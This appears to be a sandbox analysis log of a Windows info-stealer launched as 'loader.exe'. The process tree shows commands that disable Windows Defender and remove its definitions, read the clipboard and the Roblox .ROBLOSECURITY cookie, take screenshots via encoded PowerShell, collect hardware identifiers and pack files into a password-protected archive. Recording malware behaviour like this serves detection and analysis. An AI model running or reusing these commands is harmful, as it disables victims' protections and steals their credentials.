  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:3440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:4312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
  2⤵
  PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8
  2⤵
  PID:60
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:2400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5696 /prefetch:8
  2⤵
  PID:3564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
  2⤵
  PID:856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2556

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap10226:68:7zEvent19610
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4248

C:\Users\Admin\Desktop\loader.exe
"C:\Users\Admin\Desktop\loader.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4192
- C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe
  "C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe"
  2⤵
  - Executes dropped EXE
  PID:1040
- - C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe
    "C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe'"
      4⤵
      PID:3716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Host Process for Windows Services.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:3476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      4⤵
      PID:2352
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3240
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1528
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:760
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:2964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious use of AdjustPrivilegeToken
        
        PID:3516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1412
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3012
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:3148
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:4332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4072
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrjpypin\xrjpypin.cmdline"
        6⤵
        
        PID:5672
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3989.tmp" "c:\Users\Admin\AppData\Local\Temp\xrjpypin\CSCA18CBE6D904148D288ACDC8BEA798CD8.TMP"
        7⤵
        
        PID:4376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5288
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5504
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5652
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4800
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6140
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3640"
      4⤵
      PID:6016
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3640
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 644"
      4⤵
      PID:1484
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 644
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5672
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:5552
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI10402\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\YZwbb.zip" *"
      4⤵
      PID:3520
    - - C:\Users\Admin\AppData\Local\Temp\_MEI10402\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI10402\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\YZwbb.zip" *
        5⤵
        Executes dropped EXE
        
        PID:5824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:6108
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:5996
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3832
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:2652
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2988
  - - C:\Windows\system32\cmd.exe
